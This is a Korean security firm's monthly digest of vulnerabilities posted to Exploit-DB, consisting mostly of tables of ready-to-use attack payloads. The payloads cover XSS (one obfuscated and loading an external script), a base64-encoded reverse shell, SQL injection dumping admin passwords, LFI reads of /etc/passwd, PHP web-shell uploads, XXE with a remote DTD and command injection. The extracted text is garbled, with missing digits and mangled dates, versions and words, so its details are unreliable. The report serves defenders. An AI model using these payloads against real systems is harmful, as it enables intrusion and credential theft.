EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. Cross Site Scripting 공격은일반적으로 Parameter Value 를이용여공격는방법입니다. 지만 월발견된공격들은 Key 값혹은특정 HTTP Header 의 Value 를노리는공격들이주로발견되었습니다. 이러한공격들은특정프로그램에서만발생되는취약점입니다. 해당프로그램을사용는관리자는취약점에노출된페이지를확인여소스코드의시큐어코딩이시급해보입니다. 또한 월은 과관련한다양한공격패턴들도발견되었습니다. 공격은취약한명령어또는함수를파라미터로이용여해당동작을바로실행시킬수있습니다. 따라서특별한경우를제외고는관련명령어나함수를사용지말것을권고합니다. 만약해당명령어와함수를반드시사용해야할경우라면, 입력값을검증는필터에파이프 ( ), 세미콜론 (;) 등멀티라인을지원는특수문자에대한검증을실시여해당함수에유해한값이전달되지못도록해야합니다. 관련취약점이발견된소프트웨어를사용는관리자는취약점이발견된페이지와파라미터를확인여다양한 공격에대한대비가필요해보입니다.. 취약점별보고개수취약점 보고개수 8 7 취약점별보고개수 7 Information Disclosure LFI 6 File Upload 3 SQL 7 XSS 9 총합계 9 4 3 3 0 Information Disclosure LFI File Upload SQL. 위험도별분류 위험도별분류 위험도 보고개수 백분율 6.90% 7.86% 7.4% 합계 9 00.00% 3. 공격난이도별현황 공격난이도 보고개수 백분율 3.4% 6 0.69% 7.86% 총합계 9 00.00% 공격난이도별현황 6 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 Portal Webpy ProcessMaker AfterLogic WebMail Acunetix WP Security EduSec DNSmasq - Multiple Vulnerabilities Open Source Script ManageEngine Applications Manager PHP Realestate Script Script PHP Imagick Magento extplorer FlatPress CakePHP SAP xmii 총합계 9 주요소프트웨어별취약점발생현황 4 Portal Webpy ProcessMaker AfterLogic WebMail Acunetix WP Security EduSec DNSmasq - Multiple Vulnerabilities Open Source Script ManageEngine Applications Manager
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-0-04 39766 PHP Imagick 3.3.0 - / command injection 취약점 /image.jpg" cat /etc/passwd>a.txt" PHP Imagick PHP Imagick 3.3.0 06-0-04 3976 XSS <.9 0 - ipinfo.cgi XSS 취약점 /cgi-bin/ipinfo.cgi?<script>alert(/rxss-yann_cam_- _Security_Consultant_@ASafety_-_SYNETIS/)</script> <.9 0 06-0-04 3976 XSS Acunetix WP Security Plugin 3.0.3 - XSS 취약점 /wordpress/?s="><script>alert("johto.robbie"</script> Acunetix WP Security Acunetix WP Security Plugin 3.0. /cgibin/ipinfo.cgi?<script>eval(unescape("%76%6%7%0%68 %6%6%64%3D%64%6F%63%7%6D%6%6E%74%E%6 7%6%74%4%6C%6%6D%6%6E%74%73%4%79%4% 6%67%4E%6%6D%6%8%7%68%6%6%64%7%9% B%30%D%3B%76%6%7%0%73%63%7%69%70%74 06-0-04 3976 XSS %3D%0%64%6F%63%7%6D%6%6E%74%E%63%7%6 <.9 0 - %6%74%6%4%6C%6%6D%6%6E%74%8%7%73% ipinfo.cgi XSS 취약점 () 63%7%69%70%74%7%9%3B%73%63%7%69%70%74% E%74%79%70%6%3D%0%7%74%6%78%74%F%6A <.9 0 %6%76%6%73%63%7%69%70%74%7%3B%73%63%7 %69%70%74%E%73%7%63%3D%0%7%68%74%74%70 %3A%F%F%3%39%3%E%3%36%38%E%3%3%33 %E%3%F%78%E%6A%73%7%3B%68%6%6%64%E %6%70%70%6%6E%64%43%68%69%6C%64%8%73%63 %7%69%70%74%9%3B%0A%09%09%09"))</script> POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 06-0-04 3976 <.9 0 - ipinfo.cgi 취약점 (3) <.9 0 NCSA_PASS= touch /tmp/x;#&ncsa_pass_confirm= touch /tmp/x;#&ncsa_username=yanncam&action=ajouter POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 NCSA_PASS= eval `echo -e 06-0-04 3976 "YXdrICdCRUdJTiB7cyA9ICIvaWldC90Y3AvMC8xOTIu <.9 0 - MTY4LjAuMi8xMzM3Ijsg\\\\\\\\ndhpbGUoNDI ipinfo.cgi pihsgzg97ihbyaw0ziaichlbgw+iib8jibzoybzihwmi 취약점 (4) GdldGxp\\\\\\\\nbmUgYzsgaWYoYyl7IHdoaWxlI <.9 0 CgoYyB8JiBnZXRsaWlKSA+IDApIHByaW0ICQw\\\ \\\\\nihwmihm7ignsb3nlkgmpoyb9ih0gdhpb GUoYyAhPSAiZXhpdCIpIGNsb3NlKHMp\\\\\\\\n OyB9fScgLRldi9udWxs" openssl enc -a - d`;#&ncsa_pass_confirm= eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaWldC90Y3AvMC8xOTIu MTY4LjAuMi8xMzM3Ijsg\\\\\\\\ndhpbGUoNDI pihsgzg97ihbyaw0ziaichlbgw+iib8jibzoybzihwmi GdldGxp\\\\\\\\nbmUgYzsgaWYoYyl7IHdoaWxlI CgoYyB8JiBnZXRsaWlKSA+IDApIHByaW0ICQw\\\
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-0-06 39780 SQL ManageEngine Applications Manager Build 700 - downtimescheduler.do SQL 취약점 /downtimescheduler.do?method=viewmaintenancetask &taskid=- %0UNION%0ALL%0SELECT%0,,database(),4,, 6,7,8,9,0,,,3,4,%0-- ManageEngin e Applications Manager ManageEngin e Applications Manager Build 70 06-0-09 39784 - createpdf.php 취약점 /createpdf.php?targeturl=ly4uly4uly4uly4uly4uly4uly4u Ly4uLV0Yy9wYXNzdQ=&&pay_id=4&&type=actual - Multiple Vulnerabilities 06-0-09 39784 XSS - createpdf.php XSS 취약점 () POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 screen_name="><script><<imgimg SRC=oi onerror=javascript:alert()> POST /admin/default/pack_custom/test HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 06-0-6 398 LFI Webpy.4. - pack_custom LFI 취약점 () Webpy Webpy.4. file=/etc/passwd 06-0-6 3987 SQL Web interface for DNSmasq / Mikrotik - dns.php SQL 취약점 /dns_dhcp/dns/dns.php?net=%0and%0(select%0 %0from(select%0count(*),concat((select%0(select% 0concat(0xb,host,0xb,user,0xb,password,0xb))%0 from%0mysql.user%0limit%0),floor(rand(0)*))x% 0from%0mysql.user%0group%0by%0x)a) DNSmasq Web interface for DNSmasq 06-0-6 3986 File Upload extplorer..9 - Archive Path POST / HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -------------7dd009908f extplorer extplorer.. -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="filename.php" <?php exec($_get["cmd"]);?> -----------------------------7dd009908f-- 06-0-6 3983 XSS CakePHP Framework 3..4 - /cake/cake3/ XSS 취약점 GET /cake/cake3/ HTTP/. CLIENT-IP: 00.00.300.400 <script>alert('poc');</script> CakePHP CakePHP Framework 3..4 06-0-6 398 XSS Webpy.4. - /admin/default/install_plugin/ XSS 취약점 /admin/default/install_plugin/test?plugin=mathpy&sourc e=javascript:alert() Webpy Webpy.4. 06-0-7 39837 SAP xmii.0 - /XMII/ 취약점 /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../.. /../../../../../../../etc/passwd SAP xmii SAP xmii.0
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /rest/v/guest-carts/test/set-payment-information HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7 Content-Type: application/json 06-0-8 39838 Magento <.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File {"paymentmethod":{"method":"checkmo","additional_data": {"additional_information":"o:3:\\\\"credis_client\\\\" ::{s:8:\\\\"\\\\u0000*\\\\u0000redis\\\\";o:4: \\\\"Magento\\\\\\\\Sales\\\\\\\\Model\\\ \\\\\Order\\\\\\\\Payment\\\\\\\\Transactio n\\\\":40:{s:9:\\\\"\\\\u0000*\\\\u0000_order\ \\\";N;s::\\\\"\\\\u0000*\\\\u0000_parentTran saction\\\\";n;s::\\\\"\\\\u0000*\\\\u0000_chi ldren\\\\";n;s::\\\\"\\\\u0000*\\\\u0000_iden tifiedchildren\\\\";n;s:7:\\\\"\\\\u0000*\\\\u00 00_transactionsAutoLinking\\\\";b:;s:4:\\\\"\\\\u 0000*\\\\u0000_isFailsafe\\\\";b:;s::\\\\"\\\\ u0000*\\\\u0000_haschild\\\\";n;s::\\\\"\\\\u 0000*\\\\u0000_eventPrefix\\\\";s:3:\\\\"sales_ord er_payment_transaction\\\\";s::\\\\"\\\\u0000*\ \\\u0000_eventobject\\\\";s::\\\\"order_payment Magento Magento <.0.6 06-0-3 39849 SQL.4. for XenForo - Multiple SQL s () /api.php?action=getgroup&value=' UNION ALL SELECT NULL%CNULL%CNULL%CNULL%CNULL%CCONC AT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3.4. for XenForo 06-0-3 39849 SQL.4. for XenForo - Multiple SQL s /api.php?action=getusers&value=' UNION ALL SELECT CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3.4. for XenForo 06-0-4 3980 Information Disclosure AfterLogic WebMail Pro ASP.NET 6..6 - Administrator Account Disclosure via XXE /spellcheck.aspx?xml=<?xml version=".0" encoding="utf- 8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://8.7..9/test.dtd"> %remote; %int; %trick;]> AfterLogic WebMail AfterLogic WebMail Pro ASP.NET 6..6 06-0-6 398 File Upload Portal 4. - File Upload () POST /upload.php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -------------7dd009908f Portal Portal 4. -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="test.php" <? phpinfo();?> -----------------------------7dd009908f-- 06-0-6 3986 SQL EduSec 4.. - SQL /student/stumaster/view?id=%0union%0select%0,load_file( %7/etc/passwd%7),3,4,,6,7,8,9,0,,,3,4,, 6,7,8-- EduSec EduSec 4.. 06-0-6 398 XSS Portal 4. - XSS () /index.php?title=onmousemove=alert() Portal Portal 4. 06-0-7 39864 SQL PHP Realestate Script Script 4.9.0 - SQL /single.php?view_id=- 7+/*!0000union*/+select+,,user_name,4,,6,7,8,pa ssword,0,,,3,4,,6,7,8,9,0,,,3,4,,6+from+admin_login PHP Realestate Script Script PHP Realestate Script Script 4.9.0 06-0-30 39868 SQL Open Source Script 3.6.0 - SQL /contact_view.php?contact=- 7%7+/*!0000union*/+select+,,3,4,,6,7,8,9, 0,,0,3,4,,6,7,8,9,0,username,,password, 4,,6,7,8,9,30,3,3,33,34,3,36,37+/*!0000fr om*/+/*!0000admin_login*/%3 Open Source Script Open Source Script 3.6.0
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-0-3 3987 XSS POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 ProcessMaker 3.0..7 - Chrome/6.0.9.7 /sysworkflow/en/neoclassic/pro cessproxy/saveprocess XSS 취약 점 PRO_TITLE=AA<img src=x onerror=alert()>a&pro_description=bbb&pro_cate GORY= ProcessMaker ProcessMaker 3.0..7 06-0-3 3987 LFI NanoStation M.6-beta - scr.cgi LFI 취약점 /scr.cgi?fname=../../../../../etc/passwd%00&status= NanoStation M.6-bet 06-0-3 39870 File Upload FlatPress.0.3 - admin.php File Upload 취약점 POST /flatpress/admin.php?p=uploader&action=default HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="upload[]"; filename="test.php" FlatPress FlatPress.0.3 <? phpinfo();?> -----------------------------7dd009908f-- 06-0-3 3987 XSS POST /sysworkflow/en/neoclassic/processes/processeslist HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 ProcessMaker 3.0..7 - Chrome/6.0.9.7 /sysworkflow/en/neoclassic/pro cesses/processeslist XSS 취약점 # ProcessMaker ProcessMaker 3.0..7 processname=<img src=x onerror=alert();>&start=0&limit=&category=%3creset %3E= 06-0-3 3987 NanoStation M.6-beta /scr.cgi?fname=rc.poststart.sh;cat%0/etc/hosts%00&status - scr.cgi 취 = 약점 NanoStation M.6-bet